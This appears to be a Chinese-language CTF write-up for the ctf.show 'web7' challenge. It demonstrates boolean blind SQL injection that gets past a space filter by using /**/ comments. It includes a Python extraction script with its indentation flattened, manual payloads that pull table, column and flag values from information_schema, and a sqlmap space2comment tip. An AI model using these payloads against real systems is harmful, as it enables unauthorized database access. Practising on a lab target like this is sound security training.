web7
我一直在想,如果關鍵字被過濾了,怎么去判讀字段長度?
其實盲注的話,貌似就沒有這個麻煩了
做題之前先判斷哪些關鍵字被過濾了,
index.php?id=1'or1=1#
index.php?id=1'or 1=1#
一碰到空格就報錯,空格被過濾
盲注都是一個字一個字對比,很麻煩,所以這里用大佬的腳本做題
import requests
url = "https://7785f4a8-dd2f-4a53-acb5-61d19f2c5c57.chall.ctf.show/index.php?id=-1'/**/"
def db(url): # 爆庫名
for i in range(1, 5):
for j in range(32, 128):
u = "or/**/ascii(substr(database()/**/from/**/" + str(i) + "/**/for/**/1))=" + str(j) + "#"
s = url + u
print(s)
r = requests.get(s)
if 'By Rudyard Kipling' in r.text:
print(chr(j))
def table(url): # 爆表名
for i in range(4):
table_name = ''
for j in range(1, 6):
for k in range(48, 128):
u = id = "||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/" + str(
i) + ")/**/from/**/" + str(j) + "/**/for/**/1))=" + str(k) + "#"
s = url + u
print(s)
r = requests.get(s)
if 'By Rudyard Kipling' in r.text:
table_name += chr(k)
print(table_name)
db(url);
table(url);
庫名web7,表名flag,page,user
很遺憾最后模仿大佬腳本,爆column名沒法爆出
最后兩步手動
id=-1'/**/or/**/ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/0,1),1,1))=102#
id=-1'/**/or/**/ascii(substr((select/**/flag/**/from/**/flag/**/limit/**/0,1),1,1))=102#
如果用sqlmap,這題其實會簡單一點,我們使用tamper腳本,加載space2comment
因為我們已知過濾了空格,而這tamper就是將空格替換成/**/
最后結果比腳本注的全一點